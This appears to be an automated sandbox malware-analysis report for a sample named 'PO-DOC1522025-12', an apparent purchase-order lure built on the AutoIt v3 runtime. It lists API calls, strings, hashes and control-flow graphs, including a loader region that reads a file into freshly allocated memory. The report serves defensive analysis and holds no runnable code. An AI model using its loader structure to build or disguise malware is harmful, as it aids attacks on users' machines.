                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                    • String ID:
                                                                                    • API String ID: 2189390790-0
                                                                                    • Opcode ID: a60caf7edc774e086138f9a4f3ffade10ff9f6d4bdbbfc15a04670504085b233
                                                                                    • Instruction ID: 35bd73503aba653dad6c34fdd03a75bdd7385fba166a76968859282d0e8c44d5
                                                                                    • Opcode Fuzzy Hash: a60caf7edc774e086138f9a4f3ffade10ff9f6d4bdbbfc15a04670504085b233
                                                                                    • Instruction Fuzzy Hash: 3342D130604342EFEF28CF24D889BAAB7E1FF56314F55855DE466872A1D770E884CB92

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00142D07
                                                                                    • RegisterClassExW.USER32(00000030), ref: 00142D31
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00142D42
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00142D5F
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00142D6F
                                                                                    • LoadIconW.USER32(000000A9), ref: 00142D85
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00142D94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: 071ca7cb5caddd635e1fefcd16f41e9d7bff53223f9d201984eaa0498af64087
                                                                                    • Instruction ID: be970012decfd0d3f55c93d3912a25682f92e352ad7c97aeb0c961ddd479c093
                                                                                    • Opcode Fuzzy Hash: 071ca7cb5caddd635e1fefcd16f41e9d7bff53223f9d201984eaa0498af64087
                                                                                    • Instruction Fuzzy Hash: B121C7B5902319EFDB00DFA4ED49BDDBBB8FB08705F00851AF621A62A0DBB54554CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 302 18065b-18068b call 18042f 305 18068d-180698 call 16f2c6 302->305 306 1806a6-1806b2 call 175221 302->306 311 18069a-1806a1 call 16f2d9 305->311 312 1806cb-180714 call 18039a 306->312 313 1806b4-1806c9 call 16f2c6 call 16f2d9 306->313 322 18097d-180983 311->322 320 180781-18078a GetFileType 312->320 321 180716-18071f 312->321 313->311 326 18078c-1807bd GetLastError call 16f2a3 CloseHandle 320->326 327 1807d3-1807d6 320->327 324 180721-180725 321->324 325 180756-18077c GetLastError call 16f2a3 321->325 324->325 331 180727-180754 call 18039a 324->331 325->311 326->311 341 1807c3-1807ce call 16f2d9 326->341 329 1807d8-1807dd 327->329 330 1807df-1807e5 327->330 334 1807e9-180837 call 17516a 329->334 330->334 335 1807e7 330->335 331->320 331->325 345 180839-180845 call 1805ab 334->345 346 180847-18086b call 18014d 334->346 335->334 341->311 345->346 351 18086f-180879 call 1786ae 345->351 352 18086d 346->352 353 18087e-1808c1 346->353 351->322 352->351 355 1808e2-1808f0 353->355 356 1808c3-1808c7 353->356 359 18097b 355->359 360 1808f6-1808fa 355->360 356->355 358 1808c9-1808dd 356->358 358->355 359->322 360->359 361 1808fc-18092f CloseHandle call 18039a 360->361 364 180931-18095d GetLastError call 16f2a3 call 175333 361->364 365 180963-180977 361->365 364->365 365->359
                                                                                    APIs
                                                                                      • Part of subcall function 0018039A: CreateFileW.KERNELBASE(00000000,00000000,?,00180704,?,?,00000000,?,00180704,00000000,0000000C), ref: 001803B7
                                                                                    • GetLastError.KERNEL32 ref: 0018076F
                                                                                    • __dosmaperr.LIBCMT ref: 00180776
                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00180782
                                                                                    • GetLastError.KERNEL32 ref: 0018078C
                                                                                    • __dosmaperr.LIBCMT ref: 00180795
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001807B5
                                                                                    • CloseHandle.KERNEL32(?), ref: 001808FF
                                                                                    • GetLastError.KERNEL32 ref: 00180931
                                                                                    • __dosmaperr.LIBCMT ref: 00180938
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                    • String ID: H
                                                                                    • API String ID: 4237864984-2852464175
                                                                                    • Opcode ID: 06d4e71afce8f837d2a4df43e05c23aa22d688b847b9fcf38d785f3fd1f81467
                                                                                    • Instruction ID: 6174ac79a36075fd76cff8b962cc09c35afabc9019e42a57b06dcf0f9f581ddb
                                                                                    • Opcode Fuzzy Hash: 06d4e71afce8f837d2a4df43e05c23aa22d688b847b9fcf38d785f3fd1f81467
                                                                                    • Instruction Fuzzy Hash: 12A12932A001089FDF1AAF68DC967AD7BA0AB1A320F24415DF8159B3D1DB319E57CF91

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00143A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00211418,?,00142E7F,?,?,?,00000000), ref: 00143A78
                                                                                      • Part of subcall function 00143357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00143379
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0014356A
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0018318D
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001831CE
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00183210
                                                                                    • _wcslen.LIBCMT ref: 00183277
                                                                                    • _wcslen.LIBCMT ref: 00183286
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                    • API String ID: 98802146-2727554177
                                                                                    • Opcode ID: d26d89fb514fb0e12410b0a30481b27026c1491e9f0d76594b2f87f6aadeae74
                                                                                    • Instruction ID: 95e938aeb7315032f519daae46a82d76581e84b55849a23ad47db056ba58c2be
                                                                                    • Opcode Fuzzy Hash: d26d89fb514fb0e12410b0a30481b27026c1491e9f0d76594b2f87f6aadeae74
                                                                                    • Instruction Fuzzy Hash: D0719D71405305DEC314EF29EC869ABBBE8FFA4740F40482EF565971B1EB309A58CB92

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00142B8E
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00142B9D
                                                                                    • LoadIconW.USER32(00000063), ref: 00142BB3
                                                                                    • LoadIconW.USER32(000000A4), ref: 00142BC5
                                                                                    • LoadIconW.USER32(000000A2), ref: 00142BD7
                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00142BEF
                                                                                    • RegisterClassExW.USER32(?), ref: 00142C40
                                                                                      • Part of subcall function 00142CD4: GetSysColorBrush.USER32(0000000F), ref: 00142D07
                                                                                      • Part of subcall function 00142CD4: RegisterClassExW.USER32(00000030), ref: 00142D31
                                                                                      • Part of subcall function 00142CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00142D42
                                                                                      • Part of subcall function 00142CD4: InitCommonControlsEx.COMCTL32(?), ref: 00142D5F
                                                                                      • Part of subcall function 00142CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00142D6F
                                                                                      • Part of subcall function 00142CD4: LoadIconW.USER32(000000A9), ref: 00142D85
                                                                                      • Part of subcall function 00142CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00142D94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: 3e0c959d06d48fb1c3eb13acd035ed84af3a04a5421d3c9e0e98e97b26a9fea6
                                                                                    • Instruction ID: 9757f2bc64a2c0886aab0693405d45996ca3f8e2b0c6523b546fb2b9e128e33a
                                                                                    • Opcode Fuzzy Hash: 3e0c959d06d48fb1c3eb13acd035ed84af3a04a5421d3c9e0e98e97b26a9fea6
                                                                                    • Instruction Fuzzy Hash: 4C214C70E02314ABDB109FA5FC59AD9BFB4FB18B50F10849AF620A66A4DBB10560CF90
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 0014BB4E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: p#!$p#!$p#!$p#!$p%!$p%!$x#!$x#!
                                                                                    • API String ID: 1385522511-4272460735
                                                                                    • Opcode ID: 60907567cce92638725a489af31047cc21bf031b780edf99bca09e4c0aa8aecf
                                                                                    • Instruction ID: 2165d5ba08758ea8bcba404a260d04c91d206bac00c391c2145a126ee32fe529
                                                                                    • Opcode Fuzzy Hash: 60907567cce92638725a489af31047cc21bf031b780edf99bca09e4c0aa8aecf
                                                                                    • Instruction Fuzzy Hash: 4132CD70A08209DFCF29CF54C894ABEB7B9FF58304F158069E915AB261C774EE91CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 650 143170-143185 651 1431e5-1431e7 650->651 652 143187-14318a 650->652 651->652 655 1431e9 651->655 653 14318c-143193 652->653 654 1431eb 652->654 656 143265-14326d PostQuitMessage 653->656 657 143199-14319e 653->657 659 182dfb-182e23 call 1418e2 call 15e499 654->659 660 1431f1-1431f6 654->660 658 1431d0-1431d8 DefWindowProcW 655->658 667 143219-14321b 656->667 664 1431a4-1431a8 657->664 665 182e7c-182e90 call 1abf30 657->665 666 1431de-1431e4 658->666 695 182e28-182e2f 659->695 661 14321d-143244 SetTimer RegisterWindowMessageW 660->661 662 1431f8-1431fb 660->662 661->667 671 143246-143251 CreatePopupMenu 661->671 668 182d9c-182d9f 662->668 669 143201-143214 KillTimer call 1430f2 call 143c50 662->669 672 182e68-182e77 call 1ac161 664->672 673 1431ae-1431b3 664->673 665->667 689 182e96 665->689 667->666 681 182da1-182da5 668->681 682 182dd7-182df6 MoveWindow 668->682 669->667 671->667 672->667 678 182e4d-182e54 673->678 679 1431b9-1431be 673->679 678->658 683 182e5a-182e63 call 1a0ad7 678->683 687 1431c4-1431ca 679->687 688 143253-143263 call 14326f 679->688 690 182dc6-182dd2 SetFocus 681->690 691 182da7-182daa 681->691 682->667 683->658 687->658 687->695 688->667 689->658 690->667 691->687 696 182db0-182dc1 call 1418e2 691->696 695->658 700 182e35-182e48 call 1430f2 call 143837 695->700 696->667 700->658
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0014316A,?,?), ref: 001431D8
                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,0014316A,?,?), ref: 00143204
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00143227
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0014316A,?,?), ref: 00143232
                                                                                    • CreatePopupMenu.USER32 ref: 00143246
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00143267
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: 7b420c408f00370a18c0f5c9c60411b6b1675acd57dad664572e046427afea9f
                                                                                    • Instruction ID: 6ed78ae63e93be2787c63c8c024563292799a1b45960dbc48d9585dc9dae7703
                                                                                    • Opcode Fuzzy Hash: 7b420c408f00370a18c0f5c9c60411b6b1675acd57dad664572e046427afea9f
                                                                                    • Instruction Fuzzy Hash: E8414835210205ABDF192F78AC4DFF93B59E725700F044226FA32862B5DBB19F91DBA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: D%!$D%!$D%!$D%!$D%!D%!$Variable must be of type 'Object'.
                                                                                    • API String ID: 0-2751283870
                                                                                    • Opcode ID: 1edcf403aa500a194ea12cd7d07449e15f2186ed0fdaca437ee60f5c7c6d3b7a
                                                                                    • Instruction ID: ae38eb82494ab75f07a7b4be4d0ca191e3fa452f8a36b9d78ca89c7c7cb3a877
                                                                                    • Opcode Fuzzy Hash: 1edcf403aa500a194ea12cd7d07449e15f2186ed0fdaca437ee60f5c7c6d3b7a
                                                                                    • Instruction Fuzzy Hash: A2C2AB75A00205CFCB24CFA8C885AADB7F1FF18310F258569E966AB3A1D371ED51CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1216 f4cf30-f4cfde call f4a960 1219 f4cfe5-f4d00b call f4de40 CreateFileW 1216->1219 1222 f4d012-f4d022 1219->1222 1223 f4d00d 1219->1223 1228 f4d024 1222->1228 1229 f4d029-f4d043 VirtualAlloc 1222->1229 1224 f4d15d-f4d161 1223->1224 1226 f4d1a3-f4d1a6 1224->1226 1227 f4d163-f4d167 1224->1227 1230 f4d1a9-f4d1b0 1226->1230 1231 f4d173-f4d177 1227->1231 1232 f4d169-f4d16c 1227->1232 1228->1224 1235 f4d045 1229->1235 1236 f4d04a-f4d061 ReadFile 1229->1236 1237 f4d205-f4d21a 1230->1237 1238 f4d1b2-f4d1bd 1230->1238 1233 f4d187-f4d18b 1231->1233 1234 f4d179-f4d183 1231->1234 1232->1231 1241 f4d18d-f4d197 1233->1241 1242 f4d19b 1233->1242 1234->1233 1235->1224 1243 f4d063 1236->1243 1244 f4d068-f4d0a8 VirtualAlloc 1236->1244 1239 f4d21c-f4d227 VirtualFree 1237->1239 1240 f4d22a-f4d232 1237->1240 1245 f4d1c1-f4d1cd 1238->1245 1246 f4d1bf 1238->1246 1239->1240 1241->1242 1242->1226 1243->1224 1247 f4d0af-f4d0ca call f4e090 1244->1247 1248 f4d0aa 1244->1248 1249 f4d1e1-f4d1ed 1245->1249 1250 f4d1cf-f4d1df 1245->1250 1246->1237 1256 f4d0d5-f4d0df 1247->1256 1248->1224 1253 f4d1ef-f4d1f8 1249->1253 1254 f4d1fa-f4d200 1249->1254 1252 f4d203 1250->1252 1252->1230 1253->1252 1254->1252 1257 f4d0e1-f4d110 call f4e090 1256->1257 1258 f4d112-f4d126 call f4dea0 1256->1258 1257->1256 1264 f4d128 1258->1264 1265 f4d12a-f4d12e 1258->1265 1264->1224 1266 f4d130-f4d134 CloseHandle 1265->1266 1267 f4d13a-f4d13e 1265->1267 1266->1267 1268 f4d140-f4d14b VirtualFree 1267->1268 1269 f4d14e-f4d157 1267->1269 1268->1269 1269->1219 1269->1224
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F4D001
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F4D227
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                    • Instruction ID: b8fbcd5763e625911240ebcfe2a067a82e35541c802ddde2299eda42316bcacb
                                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                    • Instruction Fuzzy Hash: 17A11A71E00209EBEF14CFA4C894BEEBBB5FF48314F208559E911BB280D7799A81DB54

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1280 142c63-142cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00142C91
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00142CB2
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00141CAD,?), ref: 00142CC6
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00141CAD,?), ref: 00142CCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: 98eb3e34cd1e58c0e890594f72b606a219bd82088c682b6b97e6d1aec551d998
                                                                                    • Instruction ID: c702d8f6037fe6b1c26705cf1f54a44c921ae58f2df8a44c0fbae6b58c9d5625
                                                                                    • Opcode Fuzzy Hash: 98eb3e34cd1e58c0e890594f72b606a219bd82088c682b6b97e6d1aec551d998
                                                                                    • Instruction Fuzzy Hash: F3F0DA755412907AEB311717BC4CEB77EBDD7D6F50B0081AAFA10A26A4CA711860DAB0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1395 f4cd10-f4ce33 call f4a960 call f4cc00 CreateFileW 1402 f4ce35 1395->1402 1403 f4ce3a-f4ce4a 1395->1403 1404 f4ceea-f4ceef 1402->1404 1406 f4ce51-f4ce6b VirtualAlloc 1403->1406 1407 f4ce4c 1403->1407 1408 f4ce6d 1406->1408 1409 f4ce6f-f4ce86 ReadFile 1406->1409 1407->1404 1408->1404 1410 f4ce88 1409->1410 1411 f4ce8a-f4cec4 call f4cc40 call f4bc00 1409->1411 1410->1404 1416 f4cec6-f4cedb call f4cc90 1411->1416 1417 f4cee0-f4cee8 ExitProcess 1411->1417 1416->1417 1417->1404
                                                                                    APIs
                                                                                      • Part of subcall function 00F4CC00: Sleep.KERNELBASE(000001F4), ref: 00F4CC11
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F4CE29
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileSleep
                                                                                    • String ID: JPPZRNIL7JN2XB
                                                                                    • API String ID: 2694422964-1320512182
                                                                                    • Opcode ID: c022c776d5c0f4000647c82582226a3e53e3a6dccec0104e83173fecdbcc6ed2
                                                                                    • Instruction ID: c2a550415873bb6d45ee2d4453a11e1ca600efa516e02fc53eef597d8af68363
                                                                                    • Opcode Fuzzy Hash: c022c776d5c0f4000647c82582226a3e53e3a6dccec0104e83173fecdbcc6ed2
                                                                                    • Instruction Fuzzy Hash: 5A518F31D05248EBEF10DBE4C854BEFBB79AF18300F004198E609BB2C0D7B95A48DBA5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1729 143b1c-143b27 1730 143b99-143b9b 1729->1730 1731 143b29-143b2e 1729->1731 1732 143b8c-143b8f 1730->1732 1731->1730 1733 143b30-143b48 RegOpenKeyExW 1731->1733 1733->1730 1734 143b4a-143b69 RegQueryValueExW 1733->1734 1735 143b80-143b8b RegCloseKey 1734->1735 1736 143b6b-143b76 1734->1736 1735->1732 1737 143b90-143b97 1736->1737 1738 143b78-143b7a 1736->1738 1739 143b7e 1737->1739 1738->1739 1739->1735
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00143B0F,SwapMouseButtons,00000004,?), ref: 00143B40
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00143B0F,SwapMouseButtons,00000004,?), ref: 00143B61
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00143B0F,SwapMouseButtons,00000004,?), ref: 00143B83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: 022867eb696bea49f260880f4ca58205ecf9351c107aacc981200d662693c84f
                                                                                    • Instruction ID: 05c8c34c3dd679a1e2d532110c64d2e34b23004a63b7025dffab3d925e26d23c
                                                                                    • Opcode Fuzzy Hash: 022867eb696bea49f260880f4ca58205ecf9351c107aacc981200d662693c84f
                                                                                    • Instruction Fuzzy Hash: 5A1127B5611208FFDB218FA5DC84AAEBBB8EF44744B10896AB815D7120E3319E449BA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
